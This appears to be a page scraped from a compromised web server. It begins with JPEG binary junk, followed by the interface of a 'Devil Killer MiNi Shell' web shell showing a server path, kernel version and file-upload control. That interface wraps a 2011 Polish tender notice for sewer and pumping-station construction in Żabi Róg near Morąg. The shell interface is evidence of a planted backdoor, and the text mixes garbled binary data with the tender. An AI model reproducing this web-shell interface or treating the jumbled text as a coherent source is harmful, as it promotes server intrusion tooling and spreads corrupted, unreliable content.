JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110411/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110411/112065-N-2011.html

<p class="kh_header"><b>Morąg: Budowa kanalizacji sanitarnej we wsi Żabi Róg</b><br>
<b>Numer ogłoszenia: 112065 - 2011; data zamieszczenia: 11.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Morągu , ul. 11 Listopada 9, 14-300 Morąg, woj. warmińsko-mazurskie, tel. 089 7572231, faks 089 7572120.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.morag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kanalizacji sanitarnej we wsi Żabi Róg.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem inwestycji jest budowa sieci kanalizacji sanitarnej grawitacyjnej  i kanalizacji tłocznej w m. Żabi Róg z odprowadzeniem ścieków do oczyszczalni ścieków w Morągu poprzez nowo projektowany i istniejący układ kanalizacyjny w tej miejscowości.
Branża sanitarna
Zakres robót, tj. budowa:
- kanalizacji sanitarnej grawitacyjnej,
- przewodów tłocznych ścieków z m. Żabi Róg - proj. przepompownia P-2, P-3, P-4 i modernizacja P-1 z odprowadzaniem ścieków do projektowanej kanalizacji dla tej miejscowości i dalej do oczyszczalni ścieków,
- przepompowni ścieków w miejscowości Żabi Róg, przepompownia P-2, przepompownia P-3; przepompownia P-4; przepompownia P1 modernizowana

Kanalizacja sanitarna grawitacyjna
Sieć główna oraz przyłącza projektuje sie z rur PVC klasy S (grubościennych) kielichowych łączonych na uszczelki gumowe, dwuwargowe, o średnicy 0,315m, 0,25m, 0,2m i 0,16m (f315mm, f250mm, f200mm i f160mm). Rury przewodowe układa sie na podsypce piaskowej grubości 10cm i obsypuje sie obsypką piaskowa powyżej rury na wysokość 15cm. Montaż rur PVC wykonany będzie wg instrukcji wydanej przez producenta rur.
Uzbrojenie kanalizacji stanowią studzienki rewizyjne, przelotowe i połączeniowe z tworzyw sztucznych PEHD lub PVC f1000 mm z kineta i rura wznosząca. Na studzienkach, w związku z tym, że może odbywać sie ruch samochodowy stosować włazy typu ciężkiego, Żeliwne klasy D400 o nośności 40T, z płyta odciążająca wg PN-80/H-74051.02 i zamkiem zatrzaskowym.
Studzienki tworzywowe w jezdniach, poboczach jezdni, terenach przeznaczonych pod drogi i terenach zielonych montowane będą z typowym zbrojonym betonowym pierścieniem odciążającym. Studzienki tworzywowe na terenach pól i nieużytków montowane będą bez pierścieni odciążających wynosząc stożek studzienek z włazem 30cm ponad istniejący teren.
System kanalizacji sanitarnej z rur PVC studzienki tworzywowe będą montowane zgodnie z instrukcja montażu wydana przez producenta rur i studzienek.
Na dopływie ścieków do przepompowni (zgodnie z profilem) stosowane będą zasuwy odcinające nożowe (z nożem tnącym) z przedłużonym trzpieniem dla przepompowni P-1; P-2; P-3; P-4.

Kanalizacja sanitarna tłoczna
Rurociągi tłoczne wykonać z rur z polietylenu PE 90; 75. Będą zastosowane rurociągi ciśnieniowe PN 6 (0,6Mpa - 6atm.). Zastosowano spadki rurociągu dla umożliwienia opróżnienia części rurociągu w przypadku jego awarii. Uzbrojenie rurociągów projektuje się poprzez zastosowanie studzienki rewizyjnej (dla czyszczenia sieci) zlokalizowanej w najniższym punkcie sieci, przy przepompowni P-1 i P-2. Zastosowani studzienki z tworzywa sztucznego PE-HD lub PVC z włazem typu ciężkiego. Miejsce lokalizacji studzienki oznaczyć na tabliczce typowej umieszczonej na punktach stałych lub słupkach. Odprowadzenie ścieków następować będzie poprzez projektowana w ramach niniejszego pracowania siec tłoczna do proj. studzienek rozprężnych zlokalizowanych na rurociągu tłocznym i dalej przewodem grawitacyjnym do proj. kanalizacji grawitacyjnej.
Celem zabezpieczenia i identyfikacji przewodu tłocznego na całej jego długości przewiduje sie ułożenie nad przewodem taśmy ostrzegawczo-lokalizacyjnej z drutem identyfikacyjnym, koloru niebieskiego lub zielonego. Głębokość ułożenia przewodu ~1,70 m. Przewód układany będzie na podsypce piaskowej grubości 10 cm. Obsypanie rurociągu będzie zgodnie z instrukcja producenta około 30cm ponad rurę przy współczynniku zagęszczania 0,96 (96%). Dla podsypki lub obsypki można wykorzystywać grunt rodzimy, pod warunkiem, że będzie do tego celu odpowiedni.

Roboty ziemne
Roboty ziemne na odcinkach otwartych i bez przeszkód terenowych będą wykonywane mechanicznie. Przy zbliżeniach do istn. uzbrojenia i w terenach zabudowanych roboty ziemne wykonywać ręcznie - szczególnie dotyczyć to będzie ogródków przydomowych. Szczegóły zawarte będą w uzgodnieniach z użytkownikami terenów, przez które przebiegać będą projektowane sieci, a także uwidocznione na profilach podłużnych.
Próba szczelności
Próba szczelności kanalizacji grawitacyjnej i tłocznej będzie przeprowadzona w oparciu o normę PN-81/B-10725, oraz wytyczne producenta rur, a także wymogi użytkownika .
Przekroczenie dróg lokalnych gminnych
Przekroczenie dróg o nawierzchni asfaltowej następować będzie poprzez zastosowanie przewiertu sterowanego. Do przewiertu sterowanego projektuje sie rury ochronne, przewiertne PEHD. Końcówki rur przewiertnych zaślepione zostaną poprzez wypełnienie na długości 30cm pianka poliuretanowa.
Skrzyżowania z kablami elektroenergetycznymi oraz telekomunikacyjnymi
Wszystkie prace w pobliżu kabli będą wykonywane ręcznie i w obecności przedstawicieli i właścicieli urządzeń RE oraz TP S.A. Miejsca skrzyżowań kabli z projektowanymi rurociągami będą zabezpieczone przez nałożenie na istniejące kabla rur ochronnych.
Skrzyżowania z kanalizacją telefoniczną i wodociągiem
Sieć kanalizacyjna, telefoniczna oraz wodociągi zostaną zabezpieczone poprzez podwieszenie zgodnie z obowiązującymi przepisami i normami.
Przepompownie
Zbiorniki przepompowni zostaną wykonane jako monolityczne polimerobetonowe. Zbiorniki przepompowni będą wyniesione ponad teren około 20cm (górna płyta przykrywająca zbiornik). Przepompownie będą wyposażone w dwie pompy o wolnym przelocie każda. Przepompownie są kompletnymi obiektami dostarczanymi w komplecie z następującymi elementami:
- podwójna liczbę sprzęgieł i armatury
- rurociągiem ciśnieniowym DN 80 mm, z króćcem ciśnieniowym pompy ok. 10 cm poza zbiornikiem
- systemem sprzęgła wraz z uszczelkami
- zaworem zwrotnym i zasuwa odcinająca kompletnie zamontowane
- podłączenie płukania D= 1 1/2
- łańcuch ze stali nierdzewnej wraz z hakami mocującymi
- sterownikiem pompowni ścieków
- rura mocująca dla kontroli poziomu (czujniki poziomu)
-wyłącznikiem alarmowym powodującym załączanie sygnalizatora akustyczno-optycznego
-wyłącznikiem różnicowo-prądowym (mikroprocesorowym) do załączeń, wyłączeń pomp,
sterowania, ogrzewania, nastawa pomp (praca przemienna)
- zasilaniem silników pomp 3-fazowych, U=400V, kablem połączeniowym 10m. Układ sterowania zastosowanych przepompowni jest całkowicie automatyczny.
WIELKOŚCI CHARAKTERYSTYCZNE
Kanalizacja sanitarna grawitacyjna
Zlewnia przepompowni P4
PVC 160 - 434,5m
PVC 200 - 272,5m
PE 160 - 49,0m
PE 200 - 122,5m
Zlewnia przepompowni P1
PVC 160 - 1412,5m
PVC 200 - 634,5m
PVC 250 - 362,0m
PVC 315 - 502,0m
PE 160 - 155,0m
PE 200 - 169,0m
PE 315 - 76,0m
Zlewnia przepompowni P2
PVC 160 - 655,0m
PVC 200 - 683,5m
PVC 250 - 264,5m
PE 160 - 44,0m
PE 200 - 188,0m
PE 250 - 13,5m
Zlewnia przepompowni P3
PVC 160 - 516,0m
PVC 200 - 681,5m
PVC 250 - 221,0m
PE 160 - 26,0m
PE 200 - 81,0m
PE 250 - 39,5m

Rurociąg tłoczny
Przepompownia P4
PE 90 - 363,1m
Przepompownia P2
PE 90 - 232,0m
Przepompownia P3
PE 75 - 103,0m

Branża elektryczna

Na działce pompowni należy wykonać niżej opisane roboty.
Opis robót - dotyczy pompowni PII, PIII i PIV
W miejscu pokazanym, na planie sytuacyjnym przedstawiono miejsce zainstalowania zestawu złączowo-pomiarowego i szafki sterowniczej pompowni.
Zestaw złączowo-pomiarowy w dostawie Przedsiębiorstwa energetycznego
ENERGA-OPERATOR, szafka sterownicza w dostawie kompletnej pompowni. Dla pompowni należy wykonać oświetlenie terenu pompowni za pomocą latarni (oprawa sodowa 100W z kloszem z poliwęglanu zainstalowana na ocynkowanym słupie stalowym o wys. 4m). Słup posadowić na prefabrykowanym fundamencie.
Zasilanie latarni wykonać od szafki sterowniczej pompowni kablem YKY3x2,5 układanym w ziemi w rurze f50 typu DVR . Kabel wprowadzić bezpośrednio do oprawy. Nie stosować dodatkowych zabezpieczeń.
Od szafki ZK+SL do szafki sterowniczej pompowni ułożyć kabel YKY 4x10 w ziemi w rurze f50 typu DVR.
Instalacja antywłamaniowa pompowni i szafki sterowniczej w dostawie pompowni.
Jako system ochrony przeciwporażeniowej przed dotykiem pośrednim stosuje sie szybkie wyłączanie zasilania. Układ sieci TNC-S, czas wyłączania 5 sec.
W pompowni należy wykonać polaczenia wyrównawcze przewodami Cu10 - zgodnie z DTR pompowni, łącząc metalowe rurociągi, prowadnice pomp, metalowe elementy konstrukcyjne pompowni i przewód PE w szafce sterowniczej.
W szafce sterowniczej pompowni należy uziemić punkt PEN. Stosować uziom prętowy P2 - 2x10m, R < 10 omów. Stosować pręty miedziowane.
Polaczenia wyrównawcze pompowni podłączyć do uziomu roboczego w zestawie złączowo-pomiarowym przy pomocy bednarki Fe/Zn 30x4 układanej w wykopie (w ziemi) razem z kablem zasilającym.
Ochronę przed przepięciami stanowi wbudowany w szafce sterowniczej pompowni układ ograniczników przepięciowych o poziomie ochrony poniżej 1.5 kV.
Szczegółowy zakres przedmiotu zamówienia opisuje dokumentacja projektowa, przedmiary robót, specyfikacja techniczna wykonania i odbioru robót budowlanych.
Ze względu na ograniczoną ilość środków finansowych w bieżącym roku Zamawiający dokona płatności w roku 2011 maksymalnie na kwotę 390 000,00 zł brutto. W roku 2012   maksymalna kwota jaką zapłaci Zamawiający wynosi 2 300 000,00 zł brutto. Pozostała kwota wynagrodzenia ryczałtowego Wykonawcy zostanie opłacona w roku 2013..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu zamówień tego samego rodzaju, zgodnie z art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.10.00-5, 45.23.00.00-8, 45.31.61.00-6, 45.23.14.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości: 90 000.00 PLN (słownie:  dziewięćdziesiąt tysięcy 00/100 PLN).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Ocena spełniania warunku nastąpi na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu wymienionego w ust. 7 pkt. 7.1 str. 8 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia.
Wykonawcy winni udokumentować zrealizowanie przynajmniej jednej roboty budowlanej polegającej na:
  :: wykonaniu sieci kanalizacyjnej o wartości nie mniejszej niż 1 000 000,00 zł brutto 
  :: wykonaniu 1 szt. przepompowni ścieków
w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w ramach jednej umowy (w zakresie: sieć kanalizacyjna o wartości min. 1 000 000,00 zł brutto i 1 przepompownia ścieków) lub dwóch oddzielnych umów (jedna umowa - w zakresie: sieć kanalizacyjna o wartości min. 1 000 000,00 zł brutto i druga umowa - obejmująca zakresem min. 1 przepompownię ścieków)
Doświadczenie wykonawcy, powinno zostać potwierdzone dokumentami, z których wynika odpowiednio, że roboty budowlane zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Wykaz robót z podaniem wartości/ilości, daty i miejsca wykonania należy wykonać wg wzoru Załącznika Nr 4.
Ocena spełniania warunku nastąpi na podstawie złożonego oświadczenia stanowiącego Załącznik nr 4 do SIWZ oraz na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu wymienionego w ust. 7 pkt. 7.1 str. 8 SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym. Ocena spełniania warunku nastąpi na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu wymienionego w ust. 7 pkt. 7.1 str. 8 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - Załącznika nr 2.
Dysponowanie osobą, której zamierza powierzyć funkcję kierownika budowy do:
- do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci i instalacji wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadającymi im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów
Dysponowanie osobą, której zamierza powierzyć funkcję kierownika robót do:
- kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów
- do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadającymi im, ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia w szczególności przedstawiając pisemne w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
Ocena spełniania warunku nastąpi na podstawie złożonego oświadczenia stanowiącego Załącznik nr 2 do SIWZ oraz na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu wymienionego w ust. 7 pkt. 7.1 str. 8  SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej.
Opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
Zamawiający uzna, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówie?nia, jeżeli suma ubezpieczenia wynikająca z polisy lub innego dokumentu ubezpieczenia nie będzie niższa niż 2 000 000,00zł. W przypadku składania oferty wspólnej ww. dokumenty składa każdy z wykonawców składających ofertę wspólną. Warunek wysokości sumy ubezpieczenia zostanie uznany przez zamawiającego za spełniony, jeżeli wykonawcy składający ofertę wspólną będą spełniać go łącznie.
Ocena spełniania warunku nastąpi na podstawie złożonego dokumentu (np. polisy) oraz oświadczenia o spełnianiu warunków udziału w postępowaniu wymienionego w ust. 7 pkt. 7.1 str. 8 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie o zgodności z warunkami przetargu (Załącznik Nr 7)
2. Zobowiązanie do wniesienia zabezpieczenia (Załącznik Nr 8)
3. Dowód wpłaty wadium
4. Wypełniony i podpisany formularz ofertowy
